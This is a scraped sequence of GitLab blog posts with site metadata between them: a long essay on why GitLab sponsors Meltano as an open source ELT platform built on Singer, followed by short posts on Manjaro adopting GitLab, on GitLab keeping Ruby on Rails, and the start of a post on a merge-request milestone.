[published on the Meltano blog](https://meltano.com/blog/why-we-are-building-an-open-source-platform-for-elt-pipelines/) on May 13, 2020.\n{: .alert .alert-info}\n\nThis post is part 2 of a 2-part series to announce and provide context on the new direction of [Meltano](https://meltano.com).\nIf you've been following Meltano for a while or would like to have some historical context, start with part 1: [Revisiting the Meltano strategy: a return to our roots](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/).\nIf you're new to Meltano or are mostly interested in what's coming, feel free to skip part 1 and start here.\nIf you're worried that reading this entire post will take a lot of time, feel free to jump right to the conclusion: [Where Meltano fits in](#where-meltano-fits-in).\n{: .note}\n\n## Introduction\n\nIf you've read [part 1 of the series](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/), you know that [Meltano](https://meltano.com) is now focused on building an **open source platform for data integration and transformation (ELT) pipelines**, and that we're very excited about it.\n\nBut why are we even building this?\n\nIsn't data integration (getting data from sources, like SaaS tools, to destinations, like data warehouses) a solved problem by now, with modern off-the-shelf tools having taken the industry by storm over the past few years, making it so that many (smaller) companies and data teams don't even need data engineers on staff anymore?\n\nOff-the-shelf ELT tools are not _that_ expensive, especially compared to other tools in the data stack, like Looker, and not having to worry about keeping your pipelines up and running or writing and maintaining data source connectors (extractors) is obviously extremely valuable to a business.\n\nOn top of that, writing and maintaining extractors can be tedious, thankless work, so why would anyone want to do this themselves instead of just paying a vendor to handle this burden instead?\n\nWho would ever want to use a self-managed ELT platform? And why would anyone think building this is a good use of time or money, _especially_ if it's going to be free and open source?\n\n---\n\nIn [part 1](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/), I explained why we have concluded that in order to eventually realize our end-to-end vision for Meltano (a single tool for the entire data lifecycle, from data source to dashboard), we have to go all-in on positioning Meltano as an open source self-managed platform for running data integration and transformation (ELT) pipelines, and will turn Meltano into a true open source alternative to existing proprietary hosted solutions like [Alooma](https://www.alooma.com/), [Blendo](https://www.blendo.co/), [Hevo](https://hevodata.com/), [Matillion](https://www.matillion.com/products/etl-software/), [Pentaho](https://www.hitachivantara.com/en-us/products/data-management-analytics/pentaho-platform.html), and [Xplenty](https://www.xplenty.com/), in terms of ease of use, reliability, and quantity and quality of supported data sources.\n\nHowever, the points and questions raised above are totally valid, and were in fact raised by actual data engineers I've talked to over the past few weeks. While Meltano (and [GitLab](https://about.gitlab.com), which sponsors its development) have a need for the existence of such a tool, it's a separate matter entirely whether there are any data engineers or data teams out there who share that need.\n\nWould any data team actually consider joining the community, contributing to Meltano and its extractors and loaders, and eventually migrating to the open source tool, away from whatever proprietary solution they use today?\n\n## The problem: pay to play\n\nThe idea is that every data team in the world needs a data integration tool, because one way or another you have to get your data from your various sources into your data warehouse so that it can be analyzed. And since every company would be better off if they were analyzing their data and learning from their ups and downs, every company in the world needs a data integration tool whether they already realize it or not.\n\nSince there is currently no true open source alternative to the popular proprietary tools, the data space has effectively become \"pay to play\". There are many great open source analytics and business intelligence tools out there ([Superset](https://superset.incubator.apache.org/), [Metabase](https://www.metabase.com/), and [Redash](https://redash.io/) come to mind, and let's not forget that Meltano comes with built-in analytics functionality as well), but all assume that your data will somehow have already found its way into a data warehouse.\n\nIf for any reason at all you cannot use one of the hosted platforms, you are essentially out of luck and will not get to compete on a level playing field with those companies that can afford to integrate their data and start learning from it. Even if you have everything else going for you, you are massively disadvantaged from day one.\n\nPerhaps, you do not think of these off-the-shelf tools as particularly expensive, you're fine with your sensitive data flowing through a US company's servers, and you would happily pay for professional services if you ever need to extract data from a source that isn't supported already. \n\nHowever, many around the world will find prices US companies charge prohibitively expensive relative to their local income, may prefer (or be legally required) to have their data not leave their country or their servers, or may find that the locally grown SaaS services they use are often not supported by the existing US-centric vendors.\n\nAnd to be clear, US companies are not immune to these issues, even if they may be somewhat less affected by the financial argument. Think of HIPAA compliance, for example, which many (most? all?) hosted tools don't offer unless you sign up for one of their more expensive plans.\n\n**If you do not feel the pain of the current situation or see the need for change, recognize that your experience may not be representative.**\n\n### Data integration as a commodity\n\nThis perspective leads me to an argument with an ideological angle, that is particularly compelling to me because of the many parallels I see with the early days of [GitLab](https://about.gitlab.com/): the open source project that was [founded in Ukraine back in 2011](https://about.gitlab.com/company/history/) with the goal of building a self-managed alternative to the likes of [GitHub](https://github.com/) and [Bitbucket](https://bitbucket.org/), that a few years later became an open core product maintained primarily by the newly founded company that shares its name. To this day, GitLab comes in open source and proprietary flavors, and the functionality included in the Community Edition continues to be sufficient for hundreds of thousands of organizations around the world, that would otherwise have needed to opt for a paid, proprietary alternative. As GitLab is sponsoring the development of Meltano, these parallels are not a coincidence.\n\nSince an ELT platform is a tool every data engineer and every company needs if they want to have the best chance of survival and success, I would argue that it should be a commodity and should be available at a reasonable cost to everyone who wants or needs it. Anything less than that hurts a significant number of companies in their ability to reach their true potential and serve their users and customers as well as they would want to, thereby stifling innovation and competition, and we all end up paying the price because we have to deal with companies and products that are less optimized and improved than they could be.\n\nThe obvious question: if this is apparently such a problem, why haven't tons of competitors popped up already to serve these local markets or inject some competition into the US market? Orchestrating reliable data pipelines _is_ a solved problem, even in the open source space, where great tools like [Airflow](https://airflow.apache.org/) and [Luigi](https://github.com/spotify/luigi) exist and are running in production at thousands of organizations. That's not to say they're as easy to configure and get started with as the hosted platforms we're talking about, but the technology is there, assuming you have an extractor and loader to plug in.\n\nAnd I think that assumption is at the core of the issue, and at the core of the economic moat that the existing vendors have created around themselves, that makes it hard for new parties to enter the market and compete: the impressive amount of data sources they support out of the box, and their massive (in-house or outsourced) teams that have spent and continue to spend thousands of hours developing and maintaining these extractors and loaders.\n\nIf you've read [part 1](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/) of this 2-part series, you'll remember that we ran into this ourselves when we offered a hosted version of Meltano's data connection and analytics interface to non-technical end-users. They could go straight from connecting their data source to viewing a dashboard, but only if we had written the extractor, loader, transformations, and models for that data source beforehand, and if we would continue to maintain these forever. We realized that this wasn't going to scale, and so would most companies that would decide to just write and maintain their own extractors instead of paying someone else to do it: it's a lot of work, and **it never ends**.\n\n## The solution: open source\n\nUltimately, though, the size of the economic moat that exists around these vendors can be measured in terms of developer hours, and there's no secret sauce or intellectual property that separates the current major players from anyone else out there who has their own hours to bring to the table.\n\nBy yourself, as a single company or data engineer, implementing and maintaining extractors for all of the data sources you need to integrate is not feasible, which is why most don't.\n\nTogether, though, that changes. With a big enough group of people capable of programming and motivated to collaborate on the development and maintenance of extractors and loaders, it's just a matter of time (and continued investment of time by a subset of the community) before every proprietary extractor or loader has an open source equivalent. The maintenance burden of keeping up with API and schema changes is not insignificant, but if open source communities can manage to maintain language-specific API client libraries for most SaaS APIs out there, there's no reason to think we'd have a harder time maintaining these extractors.\n\nAssuming there is no secret sauce or key intellectual property involved, **a sufficiently large and motivated group of people capable of programming can effectively will any new tool into existence**: that is the power of open source.\n\nThe more common the data source, the more people will want it, the faster it'll be implemented, the more heavily it'll be tested, and the more actively it'll be maintained. It doesn't need to take long before the segment of the market that only uses these common data sources will be able to swap out their current data integration solution for this open source alternative. It's not an all-or-nothing matter either: data teams can move their data pipelines over on a pipeline-by-pipeline basis, as extractors become available and reach the required level of quality.\n\nOf course, a self-managed platform for running data integration pipelines wouldn't just need to support a ton of extractors and loaders. You would also want to be confident that you can run it in production and get the same reliability and monitoring capabilities you get with the hosted vendors. Fortunately, this is where we can leverage an existing open source tool like Airflow or Luigi, that this hypothetical self-managed platform could be built around.\n\n### Everyone wins\n\nEven if you're not personally interested in ever using a self-managed data integration platform, you may benefit from us building one anyway.\n\nOpen source is the most promising strategy available today to increase competition in the data integration and data pipeline space. Even if the specific tool we're building doesn't actually become the Next Big Thing, the market will benefit from that increased competition.\n\nDevelopers of new SaaS tools and data warehouse technology would also benefit from an open source standard for extractors and loaders. Rather than wait (or pay) for data integration vendors to eventually implement support for their tool once it reaches a high enough profile or once its users start begging (or paying) the vendor loudly enough, new tools could hit the ground running by writing their own integrations. Today, many companies wouldn't consider switching to a new SaaS tool that isn't supported by their data integration vendor at all, putting these tools at a significant competitive disadvantage against their more mature and well-connected competitors.\n\nThe only ones who have something to lose here are the current reigning champions. For everyone else it's a win-win, whether you actually contribute to or use Meltano, or not. If you don't believe me, just look at the [DevOps](/topics/devops/) space and the impact that GitLab has had on the industry and the strategy and offering of the previously dominant players, GitHub and Bitbucket.\n\nIf an industry has effectively become \"pay to play\" because every software engineer in that industry needs to use one of a handful of paid tools in order to get anything done at all, there is a massive opportunity for an open source alternative \"for the people, by the people\" to level the playing field, and disrupt the established players from the bottom on up.\n\nOf course, GitLab is not just interested in sponsoring the development of such an open source project out of the goodness of its heart. The hope is that eventually, a business opportunity will arise out of this project and its community and ecosystem, because even if a truly competitive free and open source self-managed option is available, there will always be companies that would still prefer a hosted version with great support and enterprise features, who won't mind paying for it.\n\nBut for everyone else, **there will always be a Community Edition, and data integration will forever be a commodity rather than pay to play**.\n\n## The Singer specification\n\nOf course, we are not the first to be intrigued by the concept of open source data integration. Most significantly, [Stitch](https://www.stitchdata.com/) has developed the [Singer specification](https://www.singer.io/), which they describe as follows:\n\n> Singer describes how data extraction scripts—called “taps” —and data loading scripts—called “targets”— should communicate, allowing them to be used in any combination to move data from any source to any destination. Send data between databases, web APIs, files, queues, and just about anything else you can think of.\n\nThere's a [Getting Started guide](https://github.com/singer-io/getting-started/) on how to develop and run taps and targets (extractors and loaders), many dozens of them have already been written for wide range of data sources, warehouses and file formats, a good amount of them are actively maintained and being used in production by various organizations, and the [Singer community on Slack](https://singer-slackin.herokuapp.com/) has over 2,100 members, with new people joining every day.\n\nOnce you've written (or installed) a tap and target, you can pipe them together on the command line (`tap | target`) and see your data flow from source to destination, which you can imagine is quite satisfying.\n\nOnce you've hit that milestone, though, the next step is not quite so obvious. How do I actually build a data pipeline out of this that I can run in production? Is there a recommended deployment or orchestration story? How do I manage my pipeline configuration and state? How do I keep track of the metrics some taps output, and how do I monitor the whole setup so that it doesn't fall flat on its face while I'm not looking?\n\nUnfortunately, the Singer specification and website don't touch on this. A number of tools have come out of the Singer community that make it easier to run taps and targets together ([PipelineWise](https://transferwise.github.io/pipelinewise/), [singer-runner](https://github.com/datamill-co/singer-runner), [tapdance](https://github.com/aaronsteers/tapdance), and [knots](https://github.com/singer-io/knots), to list a few), and some of these are successfully being used in production, but getting to that point still requires one to figure out and implement a deployment and orchestration strategy, and those who have managed to do so effectively have all needed to reinvent the wheel.\n\nThis means that while open source extractors and loaders do exist, as does a community dedicated to building and maintaining them, what's missing is the open source tooling and documentation around actually deploying and using them in production.\n\n### The missing ingredients\n\nIf this tooling did exist and if Singer-based data integration pipelines were truly easy to deploy onto any server or cloud, the Singer ecosystem immediately becomes a lot more interesting. Anyone would be able to spin up their own [Alooma](https://www.alooma.com/)/[Blendo](https://www.blendo.co/)/[Hevo](https://hevodata.com/)/[Matillion](https://www.matillion.com/products/etl-software/)/[Pentaho](https://www.hitachivantara.com/en-us/products/data-management-analytics/pentaho-platform.html)/[Xplenty](https://www.xplenty.com/)-alternative, self-managed and ready to go with a wide range of supported data sources and warehouses. Existing taps and targets would get more usage, more feedback, and more contributions, even if many prospective users may still end up opting for one of the proprietary alternatives in the end.\n\nMany people who come across the Singer ecosystem today end up giving up because they can't see a clear path towards actually using these tools in production, even if taps and targets already exist for all of the sources and destinations they're interested in. You have to be particularly determined to see it through and not just opt for one of the hosted alternatives, so the majority of people developing taps and targets and running them in production today are those for whom _not_ self-hosting was never really an option. Any amount of better tooling and documentation will cause people to take the Singer ecosystem more seriously as an open source data integration solution, and convince a couple more people to give it a try, who would have long given up today.\n\nDeveloping taps and targets is also not as easy as it could be. The Getting Started guide and [singer-tools](https://github.com/singer-io/singer-tools) toolset are a great start, and implementing a basic tap is pretty straightforward, but building one you would actually be comfortable running in production is still a daunting task. The existing taps can serve as examples, but they are not implemented consistently and don't all implement the full range of Singer features. The [singer-python](https://github.com/singer-io/singer-python) library contains utility functions for some of the most common tasks, but taps end up reimplementing a lot of the same boilerplate behavior anyway. Moreover, a testing framework or recommended strategy does not exist, meaning that users may not find out that a small inconspicuous change broke their extractor or loader until they see their entire data pipeline fail.\n\nAll in all, the Singer ecosystem has a ton of potential but suffers from a high barrier to entry, that negatively affects the experience of those who want to use using existing taps and targets, as well as those potentially interested in developing new ones.\n\nOver the past few weeks, I've spent many hours talking to various members of the Singer community who _have_ been able to get their Singer-based pipelines running in production, and the observations above are informed by their perspectives and experience. Unanimously, they agreed that the Singer ecosystem is not currently living up to its potential, that change is needed, and that better tooling and documentation around deployment and development would go a long way.\n\n## Where Meltano fits in\n\nAs I'm sure you've pieced together by now, [Meltano](https://meltano.com/) intends to be that tooling and bring that change.\n\nOur goal is to **make the power of data integration available to all** by turning Meltano into a **true open source alternative to existing proprietary hosted ELT solutions**, in terms of ease of use, reliability, and quantity and quality of supported data sources.\n\nLuckily, we're not starting from zero: Meltano already speaks the Singer language and [uses taps and targets for its extractors and loaders](https://meltano.com/#integration). Its support goes beyond simply piping two commands together, as it also manages [configuration](https://meltano.com/docs/command-line-interface.html#config), [entity selection](https://meltano.com/docs/command-line-interface.html#select) and [extractor state](https://github.com/singer-io/getting-started/blob/master/docs/CONFIG_AND_STATE.md#state-file) for you. It also makes it super easy to [set up pipeline schedules](https://meltano.com/#orchestration) that can be run on top of a supported orchestrator like [Airflow](https://airflow.apache.org/).\n\nAdditionally, Meltano supports [dbt](https://www.getdbt.com/)-based [transformation as part of every ELT pipeline](https://meltano.com/#transformation), and comes with a basic web interface for [data source connection and pipeline management](https://meltano.com/docs/analysis.html#connect-data-sources) and [point-and-click analytics and report and dashboard creation](https://meltano.com/docs/analysis.html#explore-your-data), enabling you to go from data to dashboard using a single tool, that you can [run locally or host on any cloud](https://meltano.com/docs/installation.html).\n\nFor the foreseeable future, though, our focus will primarily be on [data integration](https://meltano.com/#integration), not transformation or analysis.\n\nWhile we've come a long way already, there's still plenty of work to be done on the fronts of ease of use, reliability, and quantity and quality of supported data sources, and we can't afford to get distracted.\n\n### Let's get to work!\n\nIf any of the above has resonated with you, or perhaps even inspired you, we'd love your help in realizing this vision for Meltano, the Singer ecosystem, and the data integration space in general. We literally won't be able to do it without you.\n\nBefore anything else, you'll want to see what Meltano can already do today by following the [examples on the homepage](https://meltano.com/). They can be copy-pasted right onto your command line, and in a matter of minutes will take you all the way through [installation](https://meltano.com/#installation), [integration](https://meltano.com/#integration), [transformation](https://meltano.com/#transformation), and [orchestration](https://meltano.com/#orchestration) with the [`tap-gitlab` extractor](https://meltano.com/plugins/extractors/gitlab.html) and [`target-jsonl`](https://meltano.com/plugins/loaders/jsonl.html) and [`target-postgres`](https://meltano.com/plugins/loaders/postgres.html) loaders.\n\nOnce you've got that working, you'll probably want to try Meltano with a different, more realistic data source and destination combination, which will require you to add a new [extractor](https://meltano.com/plugins/extractors/) ([Singer tap](https://www.singer.io/#taps)) and/or [loader](https://meltano.com/plugins/loaders/) ([Singer target](https://www.singer.io/#targets)) to your Meltano project. To learn how to do this, the homepage once again [has got you covered](https://meltano.com/#meltano-add).\n\nAnd that's about as far as you'll be able to get right now, with Meltano's existing tooling and documentation. Running a Meltano pipeline locally (with or without Airflow) is one thing, but actually deploying one to production is another. As we've identified, this is one of the places where the Singer ecosystem and documentation currently fall short, and for the moment, [Meltano is no different](https://gitlab.com/groups/meltano/-/epics/79).\n\nFor this reason, the first people we would love to get involved with the Meltano project are **those who are already part of the Singer community**, and in particular **those who have already managed to get Singer-based ELT pipelines running in production**. We want to make it so that all future Singer community members and Meltano users will be able to accomplish what they did, and no one knows better what that will take (and how close or far off Meltano currently is) than they do.\n\nIf you're one of these people, or simply anyone with similarly relevant feedback, ideas, or experience, we'd love it if you would:\n\n- [give Meltano a try](https://meltano.com/) and compare it to the tools you are using today,\n- [join us on Slack](https://join.slack.com/t/meltano/shared_invite/zt-cz7s15aq-HXREGBo8Vnu4hEw1pydoRw) to receive (and provide) community support,\n- [follow us on Twitter](https://twitter.com/meltanodata) to stay up to date on new releases and other developments,\n- [file new issues on GitLab.com](https://gitlab.com/meltano/meltano/-/issues/new) for any ideas you have or bugs you run into,\n- [participate in existing issues](https://gitlab.com/meltano/meltano/-/issues) that may benefit from your perspective,\n- [check out the Python codebase](https://gitlab.com/meltano/meltano) if you're curious, and _last but not least_:\n- **consider [contributing to Meltano](https://meltano.com/#contributing), its [documentation](https://meltano.com/docs/), and its [extractors](https://meltano.com/plugins/extractors/) and [loaders](https://meltano.com/plugins/loaders/)**, so that your, our, and everyone else's hopes and dreams for Meltano may actually come true.\n\nI can't wait to see what we'll be able to accomplish together.\n\nSee you soon on [Slack](https://join.slack.com/t/meltano/shared_invite/zt-cz7s15aq-HXREGBo8Vnu4hEw1pydoRw) or [GitLab.com](https://gitlab.com/meltano/meltano)!\n",[9,803],{"slug":5458,"featured":6,"template":689},"why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines","content:en-us:blog:why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines.yml","Why Gitlab Is Building Meltano An Open Source Platform For Elt Pipelines","en-us/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines.yml","en-us/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines",{"_path":5464,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5465,"content":5470,"config":5475,"_id":5477,"_type":14,"title":5478,"_source":16,"_file":5479,"_stem":5480,"_extension":19},"/en-us/blog/why-manjaro-builds-with-gitlab",{"title":5466,"description":5467,"ogTitle":5466,"ogDescription":5467,"noIndex":6,"ogImage":1733,"ogUrl":5468,"ogSiteName":673,"ogType":674,"canonicalUrls":5468,"schema":5469},"Why the Manjaro Linux distribution builds with GitLab","Watch this interview with the Manjaro project to learn why the Linux distribution chooses to build with GitLab.","https://about.gitlab.com/blog/why-manjaro-builds-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why the Manjaro Linux distribution builds with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-08-29\",\n      }",{"title":5466,"description":5467,"authors":5471,"heroImage":1733,"date":5472,"body":5473,"category":10,"tags":5474},[2909],"2023-08-29","\nThe [Manjaro](https://manjaro.org/) project is the newest member of the [GitLab Open Source Partners](https://go.gitlab.com/BM5JwV) community. Linux users know the Manjaro project as an [open source](https://go.gitlab.com/wYTY0o) operating system that is fast, reliable, and user-friendly. We recently caught up with project leaders [Philip Müller](https://gitlab.com/philm) and [Bernhard Landauer](https://gitlab.com/oberon-manjaro) to learn how GitLab helps the Manjaro community accomplish its great work.\n\n> [Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n\n## Why the Manjaro project moved to GitLab\nIn 2018, the Manjaro community decided to [adopt GitLab](https://gitlab.manjaro.org) as its development platform, citing several key motivations:\n* **Achieve greater data sovereignty.** By migrating to a new development platform, Manjaro wanted to gain greater control over project development infrastructure. The community now hosts its own dedicated GitLab instance, where all critical Manjaro development occurs. The move has meant greater freedom and autonomy for the community. \"It feels really good to self-host and have our own control,\" Landauer said.\n\n* **Empower a small group of volunteers.** Like so many other open source projects, Manjaro relies on the dedicated work of volunteer contributors from across the world. Müller explained that the project needed a toolkit that could equip a core group of 16 developers to maintain [more than 3,000 packages](https://gitlab.manjaro.org/packages) and foster a community of roughly 8,000 participants. GitLab's sophisticated [CI/CD functionality](https://docs.gitlab.com/ee/ci/) helps the community scale to empower its relatively small developer team to manage ever-increasing complexity.\n\n* **Expand monitoring capabilities.** Using GitLab grants community leads much greater visibility into the project's operations, Müller said. By configuring various activity feeds, maintainers can more efficiently monitor potential pipeline issues and build failures across projects in the Manjaro namespace. Adopting GitLab also produced an interesting network effect for Manjaro: Using the same platform as peers, dependencies, and upstream projects meant greater overall visibility into Manjaro's open source ecosystem. \"Projects like [GNOME and KDE are switching](https://go.gitlab.com/BM5JwV) also over to GitLab,\" Müller said. \"We can look at what the upstream is doing.\"\n\n## Watch the interview\nTo learn more about Manjaro's use of GitLab, watch the full interview.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/Rn5IiI3--Ag\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n[Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n{: .note}\n",[9,267,1099],{"slug":5476,"featured":6,"template":689},"why-manjaro-builds-with-gitlab","content:en-us:blog:why-manjaro-builds-with-gitlab.yml","Why Manjaro Builds With Gitlab","en-us/blog/why-manjaro-builds-with-gitlab.yml","en-us/blog/why-manjaro-builds-with-gitlab",{"_path":5482,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5483,"content":5489,"config":5494,"_id":5496,"_type":14,"title":5497,"_source":16,"_file":5498,"_stem":5499,"_extension":19},"/en-us/blog/why-were-sticking-with-ruby-on-rails",{"title":5484,"description":5485,"ogTitle":5484,"ogDescription":5485,"noIndex":6,"ogImage":5486,"ogUrl":5487,"ogSiteName":673,"ogType":674,"canonicalUrls":5487,"schema":5488},"Why we're sticking with Ruby on Rails","GitLab CEO and co-founder Sid Sijbrandij makes the case for Ruby on Rails.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668296/Blog/Hero%20Images/gitlab-ruby.jpg","https://about.gitlab.com/blog/why-were-sticking-with-ruby-on-rails","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why we're sticking with Ruby on Rails\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2022-07-06\",\n      }",{"title":5484,"description":5485,"authors":5490,"heroImage":5486,"date":5491,"body":5492,"category":1119,"tags":5493},[1235],"2022-07-06","\nWhen David Heinemeier Hansson created Ruby on Rails ([interview](https://corecursive.com/045-david-heinemeier-hansson-software-contrarian/)), he was guided by his experience with both PHP and Java. On the one hand, he didn’t like the way the verbosity and rigidness of Java made Java web frameworks complex and difficult to use, but appreciated their structural integrity. On the other hand, he loved the initial approachability of PHP, but was less fond of the quagmires that such projects tended to turn into.\n\n![Ruby vs. Java](https://about.gitlab.com/images/blogimages/ruby1.png)\n\nIt seems like these are exclusive choices: You either get approachable and messy or well-structured and hard to use, pick your poison. We used to make a very similar, and similarly hard, distinction between server-class operating systems such as Unix, which were stable but hard to use, and client operating systems such as Windows and MacOS that were approachable but crashed a lot.\n\nEveryone accepted this dichotomy as God-given until NeXT put a beautiful, approachable and buttery-smooth GUI on top of a solid Unix base. Nowadays, “server-class” Unix runs not just beautiful GUI desktops, but also most phones and smart watches.\n\nSo it turned out that approachability and crashiness were not actually linked except by historical accident, and the same turns out to be true for approachability and messiness in web frameworks: They are independent axes.\n\n![approachability and messiness](https://about.gitlab.com/images/blogimages/ruby2.png)\n\nAnd these independent axes opened up a very desirable open spot in the lower right hand corner: an approachable, well-structured web framework.\nWith its solid, metaprogrammable Smalltalk heritage and good Unix integration, Ruby proved to be the perfect vehicle for DHH to fill that desirable bottom right corner of the table with Rails: an extremely approachable, productive and well-structured web framework. \n\n![a well-structured framework](https://about.gitlab.com/images/blogimages/ruby3.png)\n \nWhen GitLab co-founder Dmitriy Zaporozhets decided he wanted to work on software for running his (and your) version control server, he also came from a PHP background. But instead of sticking with the familiar, he chose Rails. Dmitry's choice may have been prescient or fortuitous, but it has served GitLab extremely well, in part because David succeeded in achieving his goals for Rails: approachability with good architecture.\n\n## Why modular?\n\nIn the preceding section, it was assumed as a given that modularity is a desirable property, but as we also saw it is dangerous to just assume things.  So why, and in what contexts, is modularity actually desirable?\n\nIn his 1971 paper [\"On the Criteria to be Used in Decomposing Systems into Modules\"](https://prl.ccs.neu.edu/img/p-tr-1971.pdf), David L. Parnas gave the following (desired) benefits of a modular system:\n\n- Development time should “be shortened because separate groups would work on each module with little need for communication.”\n- It should be possible to make “drastic changes or improvements in one module without changing others.”\n- It should be possible to study the system one module at a time.\n\nThe importance of reducing the need for communication was later highlighted by Fred Brooks in _[The Mythical Man Month](https://en.wikipedia.org/wiki/The_Mythical_Man-Month)_, with the additional communication overhead one of the primary reasons for the old saying that \"adding people to a late software project makes it later.\" \n\n## We don’t need microservices\n\nModularity has generally been as elusive as it is highly sought after, with the default architecture of most systems being the [Big Ball of Mud](http://laputan.org/mud/). It is therefore understandable that designers took inspiration from arguably the largest software system in existence: the World Wide Web, which is modular by necessity, it cannot function any other way.\n\nOrganizing your local software systems using separate processes, microservices that are combined using [REST](https://www.ics.uci.edu/~fielding/pubs/dissertation/fielding_dissertation.pdf) architectural style does help enforce module boundaries, via the operating system, but comes at significant costs. It is a very heavy-handed approach for achieving modularity.\n\nThe difficulties and costs of running what is now a gratuitously distributed system are significant, with some of the performance and reliability issues documented in the well-known [fallacies of distributed computing](https://en.wikipedia.org/wiki/Fallacies_of_distributed_computing). In short, the performance and reliability costs are significant, as function calls that take nanoseconds and never fail are replaced with network ops that are three to six orders of magnitude slower and do fail. Failures become much harder to diagnose if they must be traced across multiple services with very little tooling support.\nYou need a fairly sophisticated DevOps organization to successfully run microservices. This doesn't really make a difference if you run at a scale that requires that sophistication anyhow, but it is very likely that [you are not Google](https://blog.bradfieldcs.com/you-are-not-google-84912cf44afb?gi=1b82f8ef279a).\n\nBut even if you think you can manage all that, it is important to note that all this accidental complexity is on top of the original essential complexity of your problem, microservices do nothing to reduce complexity. And even the hoped-for modularity improvements are not in the least guaranteed, typically what happens instead is that you get a [distributed ball of mud](http://www.codingthearchitecture.com/2014/07/06/distributed_big_balls_of_mud.html).\n\n## Monorails\n\nBy making good architecture approachable and productive, Rails has allowed GitLab to develop a [modular monolith](https://medium.com/@dan_manges/the-modular-monolith-rails-architecture-fb1023826fc4). A modular monolith is the exact opposite of a distributed ball of mud: a well-structured, well-architected, highly modular program that runs as a single process and is as [boring](https://handbook.gitlab.com/handbook/values/#boring-solutions) as possible.\n\nAlthough structuring GitLab as a monolith has been extremely beneficial for us, we are not dogmatic about that structure. Architecture follows needs, not the other way around. And while Rails is excellent technology for our purposes, it does have a few drawbacks, one of them being performance. Luckily, only a tiny part of most codebases is actually performance critical. We use our own [gitaly](https://www.google.com/url?q=https://docs.gitlab.com/ee/administration/gitaly/&sa=D&source=docs&ust=1656441057979077&usg=AOvVaw11r4iMGjvs6PrtTJEkeTbO) daemon written in Go to handle actual git operations, and [PostgreSQL](https://thenewstack.io/two-sizes-fit-most-postgresql-and-clickhouse/) for non-repository persistence.\n\n## Open Core\n\nLast but not least, our modular monolith turns [our](/blog/gitlab-is-open-core-github-is-closed-source/) [Open Core](https://en.wikipedia.org/wiki/Open-core_model) business model from being just a nice theory into a practical [reality](https://www.cnbc.com/2021/10/14/gitlab-jumps-in-nasdaq-debut-after-pricing-ipo-above-expected-range.html). Although Rails does not accomplish this by itself, that would be our wonderful contributors and engineers, it does lay the proper foundations.\n\nIn order to reap the true [benefits](https://en.wikipedia.org/wiki/The_Cathedral_and_the_Bazaar) of open source, the source code that is made available must be approachable for contributors. In order to maintain architectural integrity in the face of contributions from a wide variety of sources, and to keep a clear demarcation line between the open and closed components, the code must be very well structured. Sound familiar?\n\nWouldn’t it be better to have a proper plugin interface? Or better yet, a services interface modeled on microservices? In a word: no. Not only do these approaches impose deployment and integration hurdles that go far beyond “I made a small change to the source code,\" they often enforce architectural constraints too rigidly. Anticipating all the future extension points is a fool's errand, one that we luckily did not embark on, and do not have to.\n\nWith our boring modular monolith, users and other third-party developers can and do contribute enhancements to the core product, giving us tremendous leverage, coupled with an unbeatable pace and scalability of innovation.\n",[685,9,708],{"slug":5495,"featured":6,"template":689},"why-were-sticking-with-ruby-on-rails","content:en-us:blog:why-were-sticking-with-ruby-on-rails.yml","Why Were Sticking With Ruby On Rails","en-us/blog/why-were-sticking-with-ruby-on-rails.yml","en-us/blog/why-were-sticking-with-ruby-on-rails",{"_path":5501,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5502,"content":5508,"config":5513,"_id":5515,"_type":14,"title":5516,"_source":16,"_file":5517,"_stem":5518,"_extension":19},"/en-us/blog/1-mil-merge-requests",{"title":5503,"description":5504,"ogTitle":5503,"ogDescription":5504,"noIndex":6,"ogImage":5505,"ogUrl":5506,"ogSiteName":673,"ogType":674,"canonicalUrls":5506,"schema":5507},"You contributed 1 million merge requests in a month!","GitLab.com surpassed 1 million merge requests in March 2019, hitting a new record for monthly engagement.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680631/Blog/Hero%20Images/1m-merge-requests-cover.png","https://about.gitlab.com/blog/1-mil-merge-requests","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"You contributed 1 million merge requests in a month!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-06-06\",\n      }",{"title":5503,"description":5504,"authors":5509,"heroImage":5505,"date":5510,"body":5511,"category":10,"tags":5512},[927],"2019-06-06","\n\nWhile the open source community comes together this week to celebrate the [fifth anniversary of Kubernetes](https://www.eventbrite.com/e/kubernetes-5th-anniversary-celebration-tickets-62064099392?aff=ebdssbdestsearch), at GitLab, we've hit a milestone of our own 🎉\n\nGitLab.com received a record **1 million merge requests** (MRs) in March 2019, the largest number of monthly MRs since the project began. The increase in engagement continued through April, when another million MRs were created. There was a 17% spike in the number of merge requests between February and March 2019 – a significant increase in engagement.\n\nThe amount of monthly MR activity has outpaced the number of active monthly users on GitLab.com. In fact, the number of new MRs per active user has increased by 40% year-over-year 